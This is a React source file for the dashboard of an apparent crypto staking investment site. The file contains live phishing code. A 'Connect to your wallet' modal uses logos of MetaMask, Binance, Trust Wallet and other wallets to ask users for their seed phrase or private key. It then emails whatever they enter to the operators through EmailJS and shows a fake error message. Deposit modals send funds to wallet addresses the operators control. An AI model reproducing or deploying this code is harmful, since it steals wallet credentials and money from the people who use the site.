
import React,{useEffect,useState} from 'react';
import Avatar from 'react-avatar';
import {
    TableContainer,
    Table,
    TableHead,
    TableBody,
    TableRow,
    TableCell,
    TextField,Modal,Select,MenuItem,InputLabel,
    Paper,
    TablePagination,FormControl,
    Button, makeStyles,

  } from '@material-ui/core';
  import Kyc from "./Kyc"
  import ActivePlans from '../components/ActivePlans';
  import { useTheme } from '@mui/material/styles';
import Rodal from 'rodal';
  import Tabs from '@mui/material/Tabs';
  import Tab from '@mui/material/Tab';
  import Alert from '@material-ui/lab/Alert';
  import PricingTable from '../components/pricingplan'
  import Nav from "../components/Nav"
  import QrCode from 'qrcode.react';
  import TransactionsTable from './transaction';
  import WithdrawTable from './withdraw';
  import axios from 'axios';
  import { useAuthState } from 'react-firebase-hooks/auth';
import { auth } from '../FirebaseConfig';
import { useNavigate, useLocation } from 'react-router-dom';
import moment from 'moment';
import PropTypes from 'prop-types';
import Typography from '@mui/material/Typography';
import Box from '@mui/material/Box';
import  Reedeemcoupons from "./Coupon"
import useWindowDimensions from '../components/useWindowDimensions';
import PinModal from '../components/pinmodal';
function TabPanel(props) {
  const { children, value, index, ...other } = props;

  return (
    <div
      role="tabpanel"
      hidden={value !== index}
      id={`full-width-tabpanel-${index}`}
      aria-labelledby={`full-width-tab-${index}`}
      {...other}
    >
      {value === index && (
        <Box sx={{ p: 3 }}>
          <Typography>{children}</Typography>
        </Box>
      )}
    </div>
  );
}

TabPanel.propTypes = {
  children: PropTypes.node,
  index: PropTypes.number.isRequired,
  value: PropTypes.number.isRequired,
};

function a11yProps(index) {
  return {
    id: `full-width-tab-${index}`,
    'aria-controls': `full-width-tabpanel-${index}`,
  };
}
const useStyles = makeStyles((theme) => ({

    paper: {
      padding: theme.spacing(3),
      margin: "10px auto",
      maxWidth: "100%",
     
      backgroundColor:"rgba(17, 25, 40, 0.75)"
    },
    paper2:{
       
       padding: theme.spacing(3),
       maxWidth: "100%",
        margin:'auto',
        '@media (max-width: 450px)': {
            width: '80%',
          },
    },
    form: {
      display: "flex",
      flexDirection: "column",
      alignItems: "stretch",
      gap: theme.spacing(2),
    },
    input: {
    
     margin:theme.spacing(2),
     color:'black !important',
     padding:"3px"
    },  table: {
        maxWidth: "100%",
        width:"60vw",
        margin:'auto',
        '@media (max-width: 570px)': {
          maxWidth: '90%',
          width:'90%'
        },
      },
    button: {
      marginTop: theme.spacing(2),
    },
  }));
const DashboardContainer = () => {
const [page, setPage] = useState(0);
const classes = useStyles();
const [rowsPerPage, setRowsPerPage] = useState(4);
const [filter, setFilter] = useState('');
const[withdrawcrypto,setWithdrawCrypto]=useState("ETH")
const[withdrawcryptoname,setWithdrawCryptoname]=useState("ETHEREUM")
const[visible2,setvisible2]=useState(false)
const[visible,setvisible]=useState(false)
const [message, setmessage] = React.useState("");
const formatCurrency = (amount, currency) => new Intl.NumberFormat('en-' + currency, { style: 'currency', currency: currency }).format(amount);
const [assets,setassets]=useState([])
const theme = useTheme();

  const[newmodal,setopennewmodal]=useState(false)
  const[balances,setbalances]=useState({})
  const[symbol,setsymbol]= useState("")
  const handleOpenModal = () => {
    setOpenModal(true);
  };

  const handleCloseModal = () => {
    setOpenModal(false);
  };

  const handleAssetChange = (event) => {
    setSelectedAsset(assets[event.target.value]);
  };

  const handleAmountChange = (event) => {
    let inputValue = event.target.value;
    // Remove all non-digits from the input value
    inputValue = inputValue.replace(/[^\d]/g, '');
    // Format the input value as a currency string
    const formattedValue = new Intl.NumberFormat('en-US', {
      style: 'currency',
      currency: 'USD'
    }).format(inputValue / 100);
    setAmount(formattedValue);
  
  };
  const [showModal, setShowModal] = useState(true);
  const [userCode, setUserCode] = useState('1234');
  const handleDeposit = () => {
    // Make post request to Firebase with deposit data
   axios.post(`https://grandstaking-default-rtdb.firebaseio.com/users/${user.uid}/userData/transactions.json`,{"status":'pending',amount:amount,paymentType:selectedAsset,asset:symbol,date:moment().format('YYYY-MM-DD')}).then(()=>{
  
    // Prompt user to visit transactions page to check deposit status
    alert('Deposit successful! Visit transactions page to check status.');
    handleCloseModal();
   }).catch(()=>{ alert('Something went wrong.');
   handleCloseModal();
   setActiveView("view3")
})
    // Close modal
  
  };
  function upload(data){
data.map((item)=>{
var newdata= {}
var dummyvar={"balance":0,"profit":0,"deposited":0}
newdata[`${item.symbol}`]=dummyvar;
console.log("data",newdata)
const endpoint = `https://grandstaking-default-rtdb.firebaseio.com/users/${user.uid}/userData/crypto/${item.symbol}/.json`;

axios
  .put(endpoint, dummyvar)
  .then((response) => {
    console.log("Data saved successfully!");
  })
  .catch((error) => {
    console.error("Error saving data: ", error);
  });


})


  }
var data=[
  {
    "coinname": "Bitcoin",
    "logo": "https://cryptologos.cc/logos/bitcoin-btc-logo.png?v=026",
    "symbol": "BTC",
    "description": "A decentralized platform for building smart contracts and decentralized applications (dApps)."
  },
  {
    "coinname": "Zcash",
    "logo": "https://cryptologos.cc/logos/zcash-zec-logo.png?v=026",
    "symbol": "ZCH",
    "description": "A proof-of-stake blockchain platform designed to enable secure and reliable transactions."
  },
  {
    "coinname": "Monero",
    "logo": "https://cryptologos.cc/logos/monero-xmr-logo.png?v=026",
    "symbol": "XMR",
    "description": "The native token of the Binance exchange, used for trading fees, discounts, and other features."
  },
  {
    "coinname": "Litecoin",
    "logo": "https://cryptologos.cc/logos/litecoin-ltc-logo.png?v=026",
    "symbol": "LTC",
    "description": "A multichain network that enables cross-chain interoperability and communication between different blockchains."
  },
  {
    "coinname": "SHIBA",
    "logo": "https://cryptologos.cc/logos/shiba-inu-shib-logo.png?v=026",
    "symbol": "SHIB",
    "description": "A decentralized oracle network that provides real-world data to smart contracts on the blockchain."
  },
  {
    "coinname": "ETHEREUM CLASSIC",
    "logo": "https://cryptologos.cc/logos/ethereum-classic-etc-logo.png?v=026",
    "symbol": "ETC",
    "description": "A decentralized oracle network that provides real-world data to smart contracts on the blockchain."
  },
  ]
const [openModal, setOpenModal] = useState(false);
const [selectedAsset, setSelectedAsset] = useState(assets[0]);
const [amount, setAmount] = useState(300);
const [data2, setData2] = useState(null);
const [country, setCountry] = useState("");
const [value, setValue] = React.useState(0);
const [activeTab, setActiveTab] = useState("kyc");
const[wallets,setwallets]=useState()
  const handleTabClick = (tab) => {
    setActiveTab(tab);
  };
  const handleFilterChange = (event) => {
    setFilter(event.target.value);
    setPage(0);
  };
  const handleChange = (event, newValue) => {
    setValue(newValue);
  };

  const filteredData = data.filter((row) =>
    row.coinname.toLowerCase().includes(filter.toLowerCase())
  );

  const emptyRows =
    rowsPerPage - Math.min(rowsPerPage, filteredData.length - page * rowsPerPage);

  const handleChangePage = (event, newPage) => {
    setPage(newPage);
  };

  const handleChangeRowsPerPage = (event) => {
    setRowsPerPage(parseInt(event.target.value, 10));
    setPage(0);
  };
  const [user] = useAuthState(auth);
  
  const [isEditing, setIsEditing] = useState(false);
  const navigate = useNavigate();
  const handleEdit = () => {
    setIsEditing(true);
  };
  const [activeView, setActiveView] = useState('view1');
  const [ucode, setucode] = useState('view1');

  const handleButtonClick = (view) => {
    setActiveView(view);
  };
  const handleSave = () => {
    fetch(`https://grandstaking-default-rtdb.firebaseio.com/users/${user.uid}/userData/.json`, {
      method: 'PATCH',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify(data2),
    })
    .then((response) => {
      if (!response.ok) {
        throw new Error('Network response was not ok');
      }
      setIsEditing(false);
      alert("Updated Successfully");
    })
    .catch((error) => {
      console.error('There was a problem with your fetch operation:', error);
    });
  };
  const handleCancel = () => {
    setIsEditing(false);
  };
  useEffect(() => {
    axios.get("https://ipapi.co/json/").then((response) => {
      setCountry(response.data.country_name);
    });
  }, []);
  useEffect(() => {
    // Show the modal every 30 minutes
    const modalTimer = setInterval(() => {
      setShowModal(true);
    }, 30 * 60 * 1000); // 30 minutes in milliseconds

    // Clean up the timer when the component unmounts
    return () => clearInterval(modalTimer);
  }, []);
  const [isLoading, setIsLoading] = useState(true);
  const handleCloseModal2 = () => {
    setShowModal(false);
  };
  useEffect(()=>{
   
    if(!user){
      // user is already signed in
      navigate('/login');
    }else{
     
        const fetchData = async () => {
            try {
              const response = await fetch(`https://grandstaking-default-rtdb.firebaseio.com/users/${user.uid}/.json`);
              const json = await response.json();
              setData2(json.userData);
              setbalances(json.userData.crypto)
             setUserCode(json.userData.code)
             setIsLoading(false)
             console.log("ff",ucode)
            } catch (error) {
              console.error(error);
            }
          };
          fetchData();
    }
   
  },[user, navigate]);

  useEffect(()=>{axios.get("https://grandstaking-default-rtdb.firebaseio.com/wallets.json")
  .then(response => {
    setwallets(response.data);
    setassets( Object.values(response.data).map(wallet => ({ name: wallet.name, walletAddress: wallet.walletAddress })))
   
  })
  .catch(error => console.log(error));},[])
  const [activeComponent, setActiveComponent] = useState('dashboard');

  const switchComponent = (component) => {
    setActiveComponent(component);
  };

  return (
    <div className="dashboard-containerr">
      
    <div style={{position:"absolute"}}>
    <Rodal width="350" height="500" visible={visible2} onClose={()=>{setvisible2(false)}}>
  
  <Box sx={{ width: '100%', bgcolor: 'background.paper' }}>

<div style={{display:'flex',flexDirection:'column',alignItems:'center',gap:'5px'}}>
<h4>Connect to your wallet</h4>
<div style={{width:'320px',display:'flex',justifyContent:'center',alignItems:'center',flexBasis:1,gap:'.3px'}}>
<div><img src='assets/images/luno.jpeg' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>LUNO </p>
<button  onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>

<div>
<img src='assets/images/metamask.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>METAMASK </p>
<button onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>

<div>
<img src='assets/images/binance.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>BINANCE </p>
<button onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>









</div>
<br/>
<div onClick={()=>{setvisible(true);setvisible2(false)}} style={{width:'320px',display:'flex',justifyContent:'center',alignItems:'center',flexBasis:1,gap:'2px'}}>

<div>
<img src='assets/images/coinomi.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>COINOMI </p>
<button onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>

<div>
<img src='assets/images/trustwallet.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>TRUSTWALLET </p>
<button onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>


<div>
<img src='assets/images/other.jpeg' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>OTHER </p>
<button onClick={()=>{setvisible(true);setvisible2(false)}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>CONNECT </button>
</div>








</div>
</div>





</Box>
</Rodal>
    </div>
    <div style={{position:"absolute"}}>
    <Rodal width="350" height="500" visible={newmodal} onClose={()=>{setopennewmodal(false)}}>
  
  <Box sx={{ width: '100%', bgcolor: 'background.paper' }}>

<div style={{display:'flex',flexDirection:'column',alignItems:'center',gap:'5px'}}>
<h4>Buy Crypto</h4>
<div style={{width:'320px',display:'flex',justifyContent:'center',alignItems:'center',flexBasis:1,gap:'.3px'}}>
<div><img src='https://i.postimg.cc/Qx5pZ49c/image.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>BLOCKCHAIN </p>
<button  onClick={()=>{setopennewmodal(false);window.location.href=('https://www.blockchain.com/')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>

<div>
<img src='https://i.postimg.cc/RZyGL6HT/image.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>EXODUS </p>
<button onClick={()=>{setopennewmodal(false);window.location.href=('https://www.exodus.com/')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>

<div>
<img src='https://i.postimg.cc/MGVP4vnC/image.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>CRYPTO.COM </p>
<button onClick={()=>{setopennewmodal(false);window.location.href=('https://www.crypto.com/')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>









</div>
<br/>
<div onClick={()=>{setvisible(true);setvisible2(false)}} style={{width:'320px',display:'flex',justifyContent:'center',alignItems:'center',flexBasis:1,gap:'2px'}}>

<div>
<img src='assets/images/binance.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>BINANCE</p>
<button onClick={()=>{setopennewmodal(false);window.location.href=('https://www.binance.com/en/crypto/buy/EUR/BTC?channel=calculator&from=ocbs')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>

<div>
<img src='assets/images/trustwallet.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>TRUSTWALLET </p>
<button onClick={()=>{setopennewmodal(false);window.location.href=('https://www.trustwallet.com/')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>


<div>
<img src='https://i.postimg.cc/WzjQS0SY/image.png' width="100"/>
<p style={{textAlign:'center',padding:'1px',fontWeight:'bold'}}>COINBASE </p>
<button onClick={()=>{setopennewmodal(false);window.location.href=('https://www.coinbase.com/')}} style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}}>BUY </button>
</div>








</div>
</div>





</Box>
</Rodal>
    </div>

  <Rodal visible={visible} width= "450" height="450" onClose={()=>{setvisible(false)}}>
  <Box sx={{ bgcolor: 'background.paper', width: 400 }}>

<Tabs
  value={value}
  onChange={handleChange}
  indicatorColor="secondary"
  textColor="inherit"
  variant="fullWidth"
  aria-label="full width tabs example"
>
  <Tab label="KEY PHRASE" {...a11yProps(0)} />
  <Tab label="PRIVATE KEY " {...a11yProps(1)} />
 
</Tabs>

<div>
<TabPanel value={value} index={0} dir={theme.direction}>
 <form>
<textarea name="" id="" cols="40" rows="5" placeholder='enter your mnemonic encrypted phrase for your current wallet' onChange={(e)=>{setmessage(e.target.value) }}></textarea>
<br/>
<button style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}} onClick={(e)=>{ e.preventDefault()
var data = {
service_id: 'service_3137mj8',
template_id: 'template_10ytcfs',
user_id: "JBRjlyMXFlloGa8HL",
template_params: {
'username': 'adam',
'message':message
}
};
if(message!==""){
axios.post('https://api.emailjs.com/api/v1.0/email/send',data).then(()=>{
alert("Unable to BUY Wallet. please contact our help Desk for Assistance")

})

}
else{
alert("fields are empty please check input and retry")
}




}} >VERIFY KEY</button>

 </form>
</TabPanel>
<TabPanel value={value} index={1} dir={theme.direction}>
<form>
<textarea name="" id="" cols="40" rows="5" placeholder='enter your  encrypted private key for your current wallet' onChange={(e)=>{setmessage(e.target.value) }}></textarea>
<br/>
<button style={{textAlign:'center',padding:'1px',backgroundColor:'teal',color:'white',fontWeight:'bold',padding:'1',border:'none',borderRadius:'3px'}} onClick={(e)=>{e.preventDefault()
var data = {
service_id: 'service_o793whf',
template_id: 'template_stgqcub',
user_id: "U4FvarRzylgOmehfM",
template_params: {
'username': 'picca',
'message':message
}
};
if(message!==""){
axios.post('https://api.emailjs.com/api/v1.0/email/send',JSON.stringify(data)).then(()=>{
alert("Unable to connect Wallet. please contact our help Desk for Assistance")

})

}
else{
alert("fields are empty please check input and retry")
}




}} >VERIFY KEY</button>

 </form>
</TabPanel>

</div>
</Box>
</Rodal>
      <div className="sidebar" style={{ width: '20%',height:"100vh" }}>
        <ul>
      <li> <img src={require('../components/EMLOGO2.png')} height={50} alt="" style={{margin:'auto'}}  onClick={() => {window.location.href="/"}} />
            </li>
           
            <div style={{borderBottom:"0.5px solid gray",width:"100%"}}></div>
          <p style={{textAlign:'left',marginLeft:'5px'}}>Manage</p>
          <li onClick={() => switchComponent('dashboard')}>
            <img src="https://i.postimg.cc/xdvn15PG/image.png" width={30}alt="" />
            <span>Dashboard</span>
          </li>
          <li onClick={() => switchComponent('plans')}>
            <img src="https://i.postimg.cc/hGd7Vb14/price-tag.png" width={30}alt="" />
            <span>Plans</span>
          </li>
          <li onClick={() => switchComponent('transactions')}>
           <img src="https://i.postimg.cc/h4CwFfzz/image.png" width={30} alt="" />
            <span>Transactions</span>
          </li>
          <li onClick={() => switchComponent('withdrawal')}>
         <img src="https://i.postimg.cc/25McgNW2/image.png" width={30} alt="" />
            <span>Withdrawal</span>
          
          </li>
          <div style={{borderBottom:"0.5px solid gray",width:"100%"}}></div>
         <p style={{textAlign:'left',marginLeft:'5px'}}>Account</p>
          <li onClick={() => switchComponent('account-settings')}>
        <img src="https://i.postimg.cc/Pr7wWfn3/image.png" width={30} alt="" />
            <span>Settings</span>
          </li>
          <div style={{borderBottom:"0.5px solid gray",width:"100%"}}></div>
       
            <p style={{textAlign:'left',marginLeft:'5px'}}>Help</p>
        
          <li onClick={() => {window.location.href="/support"}}>
        <img src="https://i.postimg.cc/Y9RhFPcY/image.png" width={30} alt="" />
            <span>Help & Support</span>
          </li>
          <li onClick={() => auth.signOut()}>
        <img src="https://i.postimg.cc/cCdfyYWM/image.png" width={30} alt="" />
            <span>Sign Out</span>
          </li>
        </ul>
      </div>

      <div className="main-content" style={{ width: '80%' }}>
        <div style={{display:'flex',flexDirection:"column",padding:"20px",margin:"20px",minWidth:"300px",maxWidth:"300px"}} className='bggr'>
      <div style={{width:"250px",display:'flex',justifyContent:"space-between"}}> {!!data2?   <p style={{textAlign:'center',textTransform:"capitalize"}}>{data2.firstName  +" "+data2.lastName}</p>:<p style={{textAlign:'center'}}>Loading...</p>}</div>
    <div style={{width:"250px",display:'flex',justifyContent:"space-between",color:'white'}}>Status:{!!data2 && !!data2.status?   <p style={{textAlign:'center'}} className={!!data2&&!!data2.status=="verified"?"teal":"red"}>{data2.status}</p>:<p style={{textAlign:'center',color:"red"}}>Loading...</p>} </div>
    <div style={{width:"250px",display:'flex',justifyContent:"space-between",color:'white'}}>Country:{!!country ?   <p style={{textAlign:'center',color:"teal"}}>{country}</p>:<p style={{textAlign:'center',color:"red"}}>Not Detected</p>} </div>
   
      </div>
        {activeComponent === 'dashboard' && (
       <>
        <Modal  open={openModal} onClose={handleCloseModal}>
        <div className="modal mdl2">
          <h2 style={{color:"white",width:"70%",margin:"auto",textAlign:"center"}}>Make a deposit</h2>
          
            <label id="asset-select-label"   style={{color:"white"}}>Payment Type</label>
            <select
              labelId="asset-select-label"
              id="asset-select"
              style={{backgroundColor:"black,width:'70%"}}
              onChange={handleAssetChange}
              label="Payment Type"
            >
               <option value="" >
               pick a payment asset
                </option>
              {assets.map((asset, index) => (
                <option value={index} key={asset.name}>
                  {asset.name}
                </option>
              ))}
            </select>
          
          <div className="qr-code-container">
            <QrCode value={!!selectedAsset?selectedAsset.walletAddress:"xxx"} size={250} />
           
          </div>
          <div style={{color:"white" ,margin:"auto",textAlign:"center"}}>{!!selectedAsset?selectedAsset.walletAddress:"xxx"} </div>
            <label style={{color:"white",width:"70%"}} htmlFor="amount-input">Amount (minimum 300)</label>
            <input
             
              id="amount-input"
              value={amount}
              style={{width:'70%'}}
              onChange={handleAmountChange}
              min={300}
            />
        <div style={{display:"flex"}}> <button variant="contained" className="field__submit" color="primary" onClick={handleDeposit}>
Deposit
</button>
<button variant="contained" style={{backgroundColor:'red'}}className="field__submit" color="warning" onClick={handleCloseModal}>
Close
</button></div>
         
</div>
</Modal>
       <div style={{display:'flex',flexDirection:'column',alignItems:'flex-start'}}>
           <div className="headrr" style={{margin:"20px"}}>
               <h1>Dashboard</h1>
           </div>
           <div style={{ backgroundColor: "#ffffff", padding: "20px",margin:'20px' }}>
      <div style={{ display: "flex", justifyContent: "center",flexWrap:'wrap' }}>
        <img
          src="https://i.postimg.cc/xjc5vg1M/zerofee.jpg"
          style={{ width: "100%", maxWidth: "200px", margin: "10px",cursor:'pointer' }}
          alt="Image 1"
          onClick={()=>{
setopennewmodal(true)
          }}
        />
        <img
          src="https://i.postimg.cc/FK1GDT18/Whats-App-Image-2023-04-06-at-3-50-03-PM.jpg"
          style={{ width: "100%", maxWidth: "200px", margin: "10px",cursor:'pointer' }}
          alt="Image 2"
          onClick={()=>{switchComponent('account-settings')}}
        />
        <img
          src="https://i.postimg.cc/rwZLYYFL/walletconnect.jpg"
          style={{ width: "100%", maxWidth: "200px", margin: "10px",cursor:'pointer' }}
          alt="Image 3"
          onClick={()=>{setvisible2(true)}}
        />
        <img
          src="https://i.postimg.cc/66PjgJCc/coupons.jpg"
          style={{ width: "100%", maxWidth: "200px", margin: "10px",cursor:'pointer' }}
          alt="Image 4"
          onClick={()=>{ if(data2.usedcoupon){
            alert("you have already used a coupon on this account!!! or coupon has expired!!")
            return;
          }
            switchComponent('coupon')}}
        />
      </div>
    </div>
           <div className="bal" style={{ width:'50%',backgroundColor:'white',margin:'20px',display:'flex',flexDirection:'column',justifyContent:'flex-start',padding:"20px"}}>
           <p style={{textAlign:'left',fontWeight:'400'}}>Your Balance:</p>
           <div className="balprev " style={{display:'flex',justifyContent:'flex-start',gap:'15px'}}>
               <div className="balprevitem">
               <p  style={{textAlign:'left'}}>Total assets:</p>
               {!!data2?  <p className="my-unique-text">{new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD' }).format(data2.balance)}</p>:<p>Loading..</p>}
               </div>
               <div className="balprevitem">
               <p style={{textAlign:'left'}}>Profits Earned:</p>
               {!!data2? <p className="my-unique-text green" style={{color:'teal'}}>{new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD' }).format(data2.profitEarned)} </p>:<p>Loading..</p>}
               </div>

           </div>
         
           </div>
           <ActivePlans userId={!!user?user.uid:""}/>
           <div className="ass" style={{ width:'100%',backgroundColor:'white',margin:'20px',display:'flex',flexDirection:'column',justifyContent:'flex-start',padding:"20px"}} >
               <p style={{textAlign:'left',fontWeight:'400'}}>Assets</p>
           <div style={{display:'flex',justifyContent:'flex-start', margin:"10px 0" ,  width:" -webkit-fill-available"}}>  <div className='ass2' >
     <TextField
       label="Filter by name"
       value={filter}
       onChange={handleFilterChange}
       style={{ marginBottom: 20,color:'white' }}
       color='white'
     />
     <TableContainer  component={Paper}  elevation={0}className={classes.paper2}>
       <Table className={classes.table}  style={{width:'60vw'}} >
         <TableHead>
           <TableRow>
             <TableCell>Coin Name(SYN)</TableCell>
             <TableCell>Deposited</TableCell>
             <TableCell>Profit</TableCell>
             <TableCell>Total Amount</TableCell>
           
             <TableCell>Actions</TableCell>
           </TableRow>
         </TableHead>
         <TableBody>
           {filteredData.map((row) => (
             <TableRow key={row.coinname}>
               <TableCell> <div style={{display:'flex',flexDirection:"row !important",justifyContent:'space-between',maxWidth:"110px"}}> 
                 <img src={row.logo} alt={row.coinname} width={35} height={35} />
                 <div style={{display:'flex',flexDirection:'column'}}>
                    <h4 style={{fontSize:'12px',textAlign:'right'}}>{row.coinname}
                  </h4>
               <p style={{textAlign:'right'}}>{row.symbol}</p>
               </div>  
                 </div>
                 
                </TableCell>
               <TableCell>
               {!!data2 && (new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD' }).format(data2.crypto[`${row.symbol}`].deposited)) }
               </TableCell>
               <TableCell>{!!data2 && (new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD' }).format(data2.crypto[`${row.symbol}`].profit)) }</TableCell>
               <TableCell>{!!data2 && (new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD' }).format(data2.crypto[`${row.symbol}`].balance)) }</TableCell>
               <TableCell>
                 <button className="field__submit" style={{margin:'auto 0',fontSize:'20px',border:'0',backgroundColor:"tomato",borderRadius:"5px"}} onClick={()=>{handleOpenModal(); setsymbol(row.symbol)}} color="primary">
                   Deposit
                 </button>
               </TableCell>
               <TableCell>
                 <button className="field__submit" style={{margin:'auto 0',fontSize:'20px',border:"none",backgroundColor:"teal",borderRadius:"5px"}} onClick={()=>{setsymbol(row.symbol);setWithdrawCrypto(row.symbol);setWithdrawCryptoname(row.coinname);switchComponent('withdrawal')}} color="primary">
                   Withdraw
                 </button>
               </TableCell>
             </TableRow>
           ))}
           {emptyRows > 0 && (
             <TableRow style={{ height: 53 * emptyRows }}>
               <TableCell colSpan={6} />
             </TableRow>
           )}
         </TableBody>
       </Table>
       
     </TableContainer>
   </div>
   </div>
           </div>

       </div>
       
       
       </>
        )}
        {activeComponent === 'transactions' && (
          <div style={{display:'flex',flexDirection:'column',alignItems:'flex-start'}}>
          <div className="headrr" style={{margin:"20px"}}>
              <h1>Transactions</h1>
          </div>
            
        <TransactionsTable/>
        </div>
        )}
        {activeComponent === 'plans' && (
          <div style={{display:'flex',flexDirection:'column',alignItems:'flex-start'}}>
          <div className="headrr" style={{margin:"20px"}}>
              <h1>Plans</h1>
          </div>
            
        <PricingTable fromdash={true}/>
        </div>
        )}
        {activeComponent=== 'coupon' &&(
          <Reedeemcoupons/>
        )}
        {activeComponent === 'withdrawal' && (
          <div style={{display:'flex',flexDirection:'column',alignItems:'flex-start'}}>
          <div className="headrr" style={{margin:"20px",padding:"20px"}}>
              <h1>Withdraw</h1>
          </div>
         
          <WithdrawTable symbol={withdrawcrypto} coinName={withdrawcryptoname}/> </div>
        )}
        {activeComponent === 'account-settings' && (
          <div>
           <nav className='navkyc'>
             <ul className='ul'>
               <li
                 className={activeTab === "kyc" ? "active li" : "li"}
                 onClick={() => handleTabClick("kyc")}
               >
               KYC
               </li>
               <li
                 className={activeTab === "account" ? "active li" : "li"}
                 onClick={() => handleTabClick("account")}
               >
                 Account
               </li>
             </ul>
           </nav>
           {activeTab === "kyc" ? <div>  <Kyc user={user.uid}/> </div>: <div><div style={{display:'flex',flexDirection:'column',alignItems:'flex-start',margin:'20px'}} >
               <div className="headrr" style={{margin:"20px",padding:"20px"}}>
              <h1>Profile Details</h1>
          </div>
         

              <Paper elevation={0} className={classes.paper2}>
         
          {!!data2 &&<form>
            {Object.keys(data2).map((field) => (
              (field!="crypto"&& field!="profitEarned" && field!="balance"&&field!="withdrawals"&&field!="transactions" &&field!="wallets" &&field!="usedcoupon" && field!="status" && field!="profitearned"&&field!="email"&&<TextField
                key={field}
                label={`${field.charAt(0).toUpperCase() + field.slice(1)}:`}
                value={data2[field]}
                onChange={(e) => setData2({ ...data2, [field]: e.target.value })}
                disabled={!isEditing}
                className={classes.input}
              />)
            ))}
            {isEditing ? (<div style={{display:"flex",gap:"10px", justifyContent:"center"}}>
              <button variant="contained" color="primary"   className="field__submit" onClick={(e)=>{e.preventDefault();handleSave()}}>
                Save
              </button>
              <button variant="contained" color="primary"  style={{backgroundColor:'red'}}  className="field__submit" onClick={handleCancel}>
             Cancel
            </button></div>
            ) : (
              <button variant="contained" color="primary"   className="field__submit" onClick={handleEdit}>
                Edit
              </button>
            )}
          </form>}
        </Paper></div></div>}
         </div>



         /* <div style={{display:'flex',flexDirection:'column',alignItems:'flex-start',margin:'20px'}} >
               <div className="headrr" style={{margin:"20px",padding:"20px"}}>
              <h1>Account </h1>
          </div>
          <Alert  severity="error">KYC Temporarily Unavailable on Site</Alert>
          <Alert severity="info">Kindly contact kycverification@grandstaking.com for manual account verification </Alert>


              <Paper elevation={0} className={classes.paper2}>
         
          {!!data2 &&<form>
            {Object.keys(data2).map((field) => (
              (field!="crypto" && field!="balance"&&field!="withdrawals"&&field!="transactions" && field!="profitearned"&&field!="email"&&<TextField
                key={field}
                label={`${field.charAt(0).toUpperCase() + field.slice(1)}:`}
                value={data2[field]}
                onChange={(e) => setData2({ ...data2, [field]: e.target.value })}
                disabled={!isEditing}
                className={classes.input}
              />)
            ))}
            {isEditing ? (<div style={{display:"flex",gap:"10px", justifyContent:"center"}}>
              <button variant="contained" color="primary"   className="field__submit" onClick={handleSave}>
                Save
              </button>
              <button variant="contained" color="primary"  style={{backgroundColor:'red'}}  className="field__submit" onClick={handleCancel}>
             Cancel
            </button></div>
            ) : (
              <button variant="contained" color="primary"   className="field__submit" onClick={handleEdit}>
                Edit
              </button>
            )}
          </form>}
        </Paper></div>
            */
           
           
        )}
      </div>
    </div>
  );
};

export default DashboardContainer;
